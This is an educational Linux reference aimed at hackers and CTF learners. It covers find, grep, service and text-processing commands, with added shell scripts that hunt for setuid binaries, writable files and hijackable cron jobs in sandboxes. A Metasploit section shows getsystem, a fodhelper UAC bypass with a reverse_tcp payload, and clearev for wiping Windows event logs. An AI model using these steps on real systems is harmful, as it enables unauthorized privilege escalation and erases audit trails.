Linux Basics

Essential Linux for Hackers.

Reference

Finding Files

find / -type f -name pass 2>/dev/null          # files named exactly "pass"
find / -name '*.txt' 2>/dev/null               # quote the glob so the shell does not expand it first
find . -writable 2>/dev/null                   # files the current user can write to; important when searching for privilege escalation (use / for the whole system)
find / -perm -4000 -type f -ls 2>/dev/null     # list setuid binaries (they run with their owner's, usually root's, privileges)
find / -name '*.txt' -ls 2>/dev/null           # list all text files on the system with details
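Added example, not part of the original notes: the two privilege-escalation searches above (setuid binaries and writable files) as shell functions, run against a constructed sandbox directory. Every path and file inside the sandbox is made up for the demo; on a real target call the functions with / as the root. It also shows a mode-based alternative to -writable, because -writable answers "can the user running find write this?" and therefore matches everything when run as root.

```shell
#!/bin/sh
# Added example (not part of the original notes): the find searches the notes
# recommend for privilege escalation, wrapped as functions and run against a
# constructed sandbox so the demo needs no root and touches nothing real.

# Setuid regular files under the given root (real use: suid_files /).
suid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# World-writable regular files under the given root. -perm -002 tests the mode
# bits, so the answer is the same whoever runs it. /proc and /sys are pruned
# because they are pure noise on a real system.
world_writable() {
    find "$1" -xdev \( -path /proc -o -path /sys \) -prune -o \
        -type f -perm -002 -print 2>/dev/null | sort
}

# Files the current user can write to (the form used in the notes).
writable_by_me() {
    find "$1" -xdev \( -path /proc -o -path /sys \) -prune -o \
        -type f -writable -print 2>/dev/null | sort
}

# Constructed sandbox: a fake setuid binary, a read-only config and a
# world-writable script (the classic target: replace what root will run).
# Prints the sandbox path.
make_sandbox() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/opt/app"
    printf '#!/bin/sh\n' > "$d/usr/bin/fakesu"
    chmod 4755 "$d/usr/bin/fakesu"       # setuid bit set, so -perm -4000 matches
    printf 'secret\n' > "$d/opt/app/config"
    chmod 0444 "$d/opt/app/config"       # readable only
    printf '#!/bin/sh\n' > "$d/opt/app/backup.sh"
    chmod 0777 "$d/opt/app/backup.sh"    # anyone can overwrite it
    echo "$d"
}

# Demo: print both lists for the sandbox, then remove it.
demo() {
    sb=$(make_sandbox)
    echo "setuid:";         suid_files "$sb"
    echo "world-writable:"; world_writable "$sb"
    rm -rf "$sb"
}
demo
```

On a real box run `suid_files /` and `world_writable /` and then read each hit: a setuid binary is only interesting if it lets you run something else (see GTFOBins-style abuse), and a writable file only if a more privileged process executes or reads it.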

Locate command

locate rockyou.txt
sudo updatedb  (rebuilds the locate database; run it first, or files created since the last update are not found)

ls sorted by modification time

ls -lt   (newest first; -tr for oldest first)

Find files based on filename

find [directory path] -type f -name [filename]

find /home/Andy -type f -name sales.txt

Find Directory based on directory name

find [directory path] -type d -name [directory name]

find /home/Andy -type d -name pictures

Find files based on size

find [directory path] -type f -size [size]

find /home/Andy -type f -size 10c

(c for bytes, k for kibibytes (1024 bytes), M for mebibytes, G for gibibytes;
a bare size matches exactly, +10M matches files larger than 10 MiB and -10M smaller.
Type 'man find' for full information on the options.)

Find files based on username

find [directory path] -type f -user [username]

find /etc/server -type f -user john

Find files based on group name

find [directory path] -type f -group [group name]

find /etc/server -type f -group teamstar

Find files modified after a specific date

find [directory path] -type f -newermt '[date and time]'

find / -type f -newermt '2020-06-30 00:00:00'

(matches files modified after 30 June 2020 00:00:00; -newermt is a GNU find option and accepts any date GNU date can parse, but the ISO form avoids day/month ambiguity)

Find files based on date modified

find [directory path] -type f -newermt [start date range] ! -newermt [end date range]

find / -type f -newermt 2013-09-12 ! -newermt 2013-09-14

(-newermt means strictly newer than, and a bare date is midnight at the start of that day: the first test keeps files modified after 2013-09-12 00:00, the second drops files modified after 2013-09-14 00:00, so the command matches files modified during 12 or 13 September 2013. To match a single day, give the next day as the end date.)

Find files based on date accessed

find [directory path] -type f -newerat [start date range] ! -newerat [end date range]

find / -type f -newerat 2017-09-12 ! -newerat 2017-09-14

(same range logic as above, applied to access time: matches files accessed during 12 or 13 September 2017. Access times are only as reliable as the mount options: with relatime, the Linux default, atime is updated only when it is older than mtime or more than a day old, and noatime never updates it.)
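Added example, not part of the original notes: the date-range search as a function, run on constructed files whose modification times are set with touch -t so you can see exactly which side of each boundary is included. The file names and timestamps are made up for the demo; the same shape with -newerat covers access time.

```shell
#!/bin/sh
# Added example (not part of the original notes): which files the
# "-newermt start ! -newermt end" range matches, shown on constructed files.

# Regular files under $1 modified after $2 and not after $3. The range is
# half-open: a file stamped exactly at $2 is not "newer than" $2 and is
# excluded, a file stamped exactly at $3 is kept.
files_modified_between() {
    find "$1" -type f -newermt "$2" ! -newermt "$3" 2>/dev/null | sort
}

# Constructed directory with one file per interesting moment (touch -t takes
# CCYYMMDDhhmm.SS and is portable between GNU and BSD). Prints its path.
make_dated_files() {
    d=$(mktemp -d)
    touch -t 201309112359.59 "$d/sep11_late"    # before the range
    touch -t 201309121200.00 "$d/sep12_noon"    # inside: modified during the 12th
    touch -t 201309131200.00 "$d/sep13_noon"    # inside: modified during the 13th
    touch -t 201309141200.00 "$d/sep14_noon"    # after 2013-09-14 00:00, excluded
    echo "$d"
}

demo() {
    d=$(make_dated_files)
    echo "modified in (2013-09-12 00:00, 2013-09-14 00:00]:"
    files_modified_between "$d" 2013-09-12 2013-09-14
    rm -rf "$d"
}
demo
```

Timestamps are evidence, not proof: anything that can write a file can also reset its mtime with touch, so treat a suspicious gap in the timeline as seriously as a hit.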

Find files containing a specific keyword

grep -iRl [keyword] [directory path]

grep -iRl flag /folderA

(-i ignores case, -R recurses into directories, -l prints only the names of matching files; drop -l to see the matching lines)

Exclude lines matching a pattern

grep -v "hello"

read the manual for the find command

man find

check the bash history

history   (the current shell's history; ~/.bash_history holds what earlier sessions saved)

SSH key does not work

chmod 600 [private key file]   (ssh refuses a private key that group or others can read: "Permissions are too open")

Check Sudo Permissions

sudo -l   (lists the commands this user may run with sudo, and as which user; the first check for privilege escalation)

Calculate Hash

sha256sum filename   (computes the SHA-256 hash; md5sum and sha1sum work the same way)

Logs

Linux logs are located in /var/log

Important commands

whoami

Displays current username.

id

Returns the user's identity: uid, primary gid and every group the user is a member of.

hostname

Sets or prints the name of current host system.

uname -a

Prints basic information about the operating system name and system hardware.

pwd

Returns working directory name.

ifconfig

The ifconfig utility is used to assign an address to a network interface or view it, and to configure interface parameters. It is deprecated on modern distributions in favour of ip.

ip

ip is a utility to show or manipulate routing, network devices, interfaces and tunnels.

netstat

Shows network status (listening ports and connections); largely replaced by ss.

ss

Another utility to investigate sockets.

ps

Shows process status.

ps aux

Shows the processes of all users, including those without a controlling terminal.

top

real time view of processes

who

Displays who is logged in.

env

Prints the environment, or runs a command in a modified environment.

lsblk

Lists block devices.

lsusb

Lists USB devices

lsof

Lists open files, including sockets (lsof -i shows network connections and which process holds them).

lspci

Lists PCI devices.

wc -l access.log

Shows the number of lines in a file.

su

The su utility requests the target user's credentials via PAM and switches to that user ID (the default is the superuser), then starts a shell. The dash gives a login shell with that user's environment:

su - rocketchat

useradd

Creates a new user or update default new user information.

userdel

Deletes a user account and related files.

usermod

Modifies a user account.

addgroup

Adds a group to the system.

delgroup

Removes a group from the system.

passwd

Changes user password.

lsb_release -a

Current OS version

Start/stop a service

systemctl stop myservice

  • start

  • stop

  • enable (start at boot)

  • disable

  • status

Background a process

  • ctrl+z suspends the foreground job; bg lets it continue in the background

  • add & at the end of a command to start it in the background

  • jobs lists the background jobs; fg %1 brings job 1 back to the foreground (fg takes a job number, not a PID)

Important Files

File                            Directory   Importance

shadow, passwd                  /etc        passwords (hashes are in shadow, readable only by root)
sudoers                         /etc        sudo permissions
log, backup                     /var
                                /tmp        writable in most cases
fail2ban.log, ufw.log, apache   /var/log    important logs

cronjobs

cron is a daemon started at boot that runs scheduled jobs. The jobs live in crontabs: /etc/crontab and the files in /etc/cron.d for the system (these carry an extra user field before the command), plus one per user managed with the crontab command.

A crontab is simply a specially formatted file that the cron daemon reads line by line. Each job line has 6 fields:

Value   Description

MIN     What minute to execute at
HOUR    What hour to execute at
DOM     What day of the month to execute at
MON     What month of the year to execute at
DOW     What day of the week to execute at
CMD     The actual command that will be executed

An online crontab generator can be used to build the time fields. Crontabs are edited with crontab -e, which lets you pick an editor (such as nano).

crontab -l   lists the current user's crontab; cat /etc/crontab and ls /etc/cron.d show the system jobs (worth reading for privilege escalation: a root job that runs a script you can write to)
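Added example, not part of the original notes: a parser for system-style crontab lines (the 6-field layout above plus the user column that /etc/crontab and /etc/cron.d use) that flags jobs whose target a low-privileged user could replace. It runs against a constructed crontab and sandbox directory; every path in it is made up, and the check itself only looks at mode bits, so it does not depend on who runs it.

```shell
#!/bin/sh
# Added example (not part of the original notes): find cron jobs whose program
# is world-writable, or missing from a world-writable directory. Expects the
# system crontab format (5 time fields, user, command); user crontabs from
# "crontab -l" have no user field and would need $5/$6 instead.

# Print "user program" for every active job line in the crontab file $1.
cron_jobs() {
    awk '
        /^[ \t]*(#|$)/              { next }          # comment or blank line
        /^[A-Za-z_][A-Za-z0-9_]*=/  { next }          # SHELL=, PATH=, MAILTO= assignments
        NF >= 7                     { print $6, $7 }  # 5 time fields, user, command
    ' "$1"
}

# True if $1 has the other-write bit set (same answer whoever runs the check).
is_world_writable() {
    [ -n "$(find "$1" -maxdepth 0 -perm -002 2>/dev/null)" ]
}

# Report each job whose program is world-writable, or does not exist but sits
# in a world-writable directory (an attacker can simply create it there).
cron_writable_targets() {
    cron_jobs "$1" | while read -r user prog; do
        case "$prog" in /*) ;; *) continue ;; esac    # relative names depend on PATH; skip
        if [ -e "$prog" ]; then
            if is_world_writable "$prog"; then echo "$user $prog writable"; fi
        elif is_world_writable "$(dirname "$prog")"; then
            echo "$user $prog missing-in-writable-dir"
        fi
    done
}

# Constructed sandbox: a sane job, a world-writable script and a job pointing
# at a file that does not exist inside a world-writable directory. Prints the
# sandbox path; the crontab is written as $sandbox/crontab.
make_cron_sandbox() {
    d=$(mktemp -d)
    mkdir -p "$d/opt/backup" "$d/usr/local/bin" "$d/var/dropzone"
    printf '#!/bin/sh\n' > "$d/opt/backup/run.sh";     chmod 0755 "$d/opt/backup/run.sh"
    printf '#!/bin/sh\n' > "$d/usr/local/bin/cleanup"; chmod 0777 "$d/usr/local/bin/cleanup"
    chmod 0777 "$d/var/dropzone"
    cat > "$d/crontab" <<EOF
# constructed /etc/crontab for the demo
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
17 *    * * *   root    $d/opt/backup/run.sh --full
*/5 *   * * *   root    $d/usr/local/bin/cleanup
0  3    * * 0   root    $d/var/dropzone/rotate.sh
EOF
    echo "$d"
}

demo() {
    d=$(make_cron_sandbox)
    cron_writable_targets "$d/crontab"
    rm -rf "$d"
}
demo
```

Run `cron_writable_targets /etc/crontab` and loop over /etc/cron.d/* on a real host. Jobs that give a bare command name are skipped here on purpose: which binary they resolve to depends on the PATH= line at the top of the crontab, which is a separate thing to check.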

Services

Start a service

systemctl start ssh
systemctl status ssh

run a service after start up

systemctl enable ssh

Enumerate services

ps aux
systemctl list-units --type=service

Access a shared folder

In the file manager's Network tab press ctrl + L and enter the address:

smb://192.168.1.11

Escalate privileges (meterpreter)

getsystem
getsystem -t 1   (try only technique 1, named pipe impersonation)

Bypass Windows UAC

background the session with ctrl+z

use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
set payload windows/meterpreter/reverse_tcp
run

(a reverse_tcp payload also needs LHOST and LPORT set to your listener)

Clear logs (meterpreter)

clearev   (clears the Windows Application, System and Security event logs; clearing a log is itself recorded on the target)

Cat alternative

If the cat command does not work, try head, less, nano or vim. If none of those work, use grep:

grep . hash.txt   # prints every non-empty line of the file
grep -R .         # prints every non-empty line of every file under the current directory, prefixed with its name

Playing with text: sorting, finding unique values and cutting fields

# The first use of the cut command retrieves the column of the domain:port, and the second one removes the port by splitting it with a colon.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1
sway.com
sway.com
sway.office.com
--- REDACTED FOR BREVITY ---

# After retrieving the domains, the sort command arranges the list in alphabetical order

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
--- REDACTED FOR BREVITY ---

# Lastly, the uniq command removes the duplicates (it only collapses adjacent identical lines, which is why the list is sorted first)

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq
account.activedirectory.windowsazure.com
activity.windows.com
admin.microsoft.com
--- REDACTED FOR BREVITY ---

We already have the list of unique domains based on our previous use case. Now, we only need to add some parameters to our commands to get the count of each domain accessed. This can be done by adding the -c option to the uniq command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c
    423 account.activedirectory.windowsazure.com
    184 activity.windows.com
    680 admin.microsoft.com
    272 admin.onedrive.com
    304 adminwebservice.microsoftonline.com

Moreover, the result can be sorted again based on the count of each domain by using the -n option of the sort command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -n
     78 partnerservices.getmicrosoftkey.com
    113 **REDACTED**
    118 ocsp.digicert.com
    123 officeclient.microsoft.com
--- REDACTED FOR BREVITY ---

Based on the result, you can see that the count of connections made for each domain is sorted in ascending order. If you want to make the output appear in descending order, use the -r option. Note that it can also be combined with the -n option (-nr if written together).

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -nr
   4992 www.office.com
   4695 login.microsoftonline.com
   1860 www.globalsign.com
   1581 **REDACTED**
   1554 learn.microsoft.com
--- REDACTED FOR BREVITY --
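Added example, not part of the original notes: the cut | sort | uniq -c | sort -nr pipeline above packaged as a function and run on a constructed proxy-log excerpt in the same layout (field 3 is domain:port; the lines are made up), with a second function that shows why sort has to come before uniq.

```shell
#!/bin/sh
# Added example (not part of the original notes): the domain-counting pipeline
# from the notes as reusable functions over a constructed access.log.

# Write a constructed access.log and print its path.
sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
1696500000.001 10.0.0.5 www.office.com:443 CONNECT 200
1696500000.002 10.0.0.5 login.microsoftonline.com:443 CONNECT 200
1696500000.003 10.0.0.7 www.office.com:443 CONNECT 200
1696500000.004 10.0.0.5 ocsp.digicert.com:80 GET 200
1696500000.005 10.0.0.7 login.microsoftonline.com:443 CONNECT 200
1696500000.006 10.0.0.7 www.office.com:443 CONNECT 200
EOF
    echo "$f"
}

# Domains from field 3 of the log, one per line, port stripped.
domains() {
    cut -d ' ' -f3 "$1" | cut -d ':' -f1
}

# Top $2 domains of log $1 as "count domain", most frequent first. awk
# collapses the right-aligned count column that uniq -c prints so the output
# is easy to compare or feed to another tool.
top_domains() {
    domains "$1" | sort | uniq -c | sort -nr | head -n "$2" | awk '{print $1, $2}'
}

# Number of distinct domains in log $1.
distinct_domains() {
    domains "$1" | sort -u | awk 'END {print NR}'
}

# The pitfall: uniq only merges *adjacent* identical lines. Without sort, an
# interleaved log yields one group per line and the counts mean nothing.
unsorted_groups() {
    domains "$1" | uniq -c | awk 'END {print NR}'
}

demo() {
    log=$(sample_log)
    echo "top domains:";         top_domains "$log" 3
    echo "distinct:";            distinct_domains "$log"
    echo "groups without sort:"; unsorted_groups "$log"
    rm -f "$log"
}
demo
```

Swap the field number in domains() to pivot the same pipeline on source IP, method or status code.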
